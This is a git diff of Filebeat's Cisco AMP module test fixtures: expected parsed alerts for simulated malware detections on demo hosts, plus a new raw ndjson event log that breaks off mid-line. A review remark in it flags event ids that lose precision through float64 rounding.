"b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Upatre", + "host.name": 
"Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 314451, + "log.offset": 57972, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Upatre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -6070,60 +2397,66 @@ ] }, { - "@timestamp": "2021-01-15T10:09:30.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 292000000, + "cisco.amp.timestamp_nanoseconds": 672000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256988482109000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 315770, + "log.offset": 59570, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6131,7 +2464,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:29.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6142,8 +2475,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6152,14 +2485,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 782000000, + "cisco.amp.timestamp_nanoseconds": 653000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666703518204000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -6173,7 +2506,7 @@ "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 317089, + "log.offset": 60896, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6196,7 +2529,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:27.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6207,25 +2540,24 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 80000000, + "cisco.amp.timestamp_nanoseconds": 260000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666694928269000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
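Review bot: The new expected `event.id` in hunk `@@ -6207,25 +2540,24 @@` is the bare number `6533668885361590000` while the same event's `cisco.amp.detection_id` is the string `"6533668885361590307"`, which looks like a 19-digit id rounded through a float64. The hunks at `@@ -6070` and `@@ -6142`/`@@ -6152` end up with the identical `event.id` for detection ids ending in 309 and 308, so three separate alerts share one id. The same pattern repeats for the 6533669409347600xxx and 6533669147354595xxx groups. Anything downstream that deduplicates or correlates alerts on `event.id` would presumably merge or drop them. `event.id` should be carried as a string end to end, so the expected line would read `"event.id": "<full 19-digit id>"`; that fix belongs in the module's pipeline or input decoding, which is outside this file.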
@@ -6233,20 +2565,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 319725, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 2204, + "log.offset": 62215, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6269,7 +2594,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:24.000Z", + "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6281,7 +2606,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.detection_id": "6176259135965757532", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6290,14 +2615,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 286000000, + "cisco.amp.timestamp_nanoseconds": 8000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256962712306000, + "event.id": 6176259135965757000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -6310,7 +2635,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 321307, + "log.offset": 63534, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", 
@@ -6330,72 +2655,55 @@ ] }, { - "@timestamp": "2021-01-15T10:09:07.000Z", + "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617250006073346", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 296000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617250006073000, + "event.id": 1489955900291000600, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "tdss.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": 
"Demo_TeslaCrypt", "input.type": "log", - "log.offset": 322626, - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "explorer.exe", - "process.pid": 1892, + "log.offset": 64851, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_TDSS" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -6403,80 +2711,64 @@ ] }, { - "@timestamp": "2021-01-15T10:09:02.000Z", + "@timestamp": "2021-01-15T10:17:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "5a:ff:4a:a3:8a:2f" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "DFC.CustomIPList", - "cisco.amp.detection_id": "5826709511729053698", - "cisco.amp.event_type_id": 1090519084, + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], - "cisco.amp.network_info.nfm.direction": "Outgoing connection from", - "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "5a:ff:4a:a3:8a:2f" + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 613000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.4.4", - "destination.port": 80, - "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 5826709511729054000, + "event.id": 6159251516445164000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", "fileset.name": "amp", - "host.hostname": "Demo_Tinba", - "host.name": "Demo_Tinba", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 324228, - "network.direction": "egress", - "network.transport": "TCP", - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "Explorer.EXE", - "process.pid": 1600, + "log.offset": 66143, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], "related.hosts": [ - "Demo_Tinba" + "Demo_TeslaCrypt" ], "related.ip": [ - "10.10.0.0", - "8.8.4.4", "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", - "source.ip": "10.10.0.0", - "source.port": 1083, "tags": [ "cisco-amp", "forwarded" - ], - "url.domain": "dak1otavola1ndos.com", - "url.extension": "php", - "url.original": "http://dak1otavola1ndos.com/h/index.php", - "url.path": "/h/index.php", - "url.scheme": "http" + ] } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log new file mode 100644 index 00000000000..4a0581fcd4d --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log 
@@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
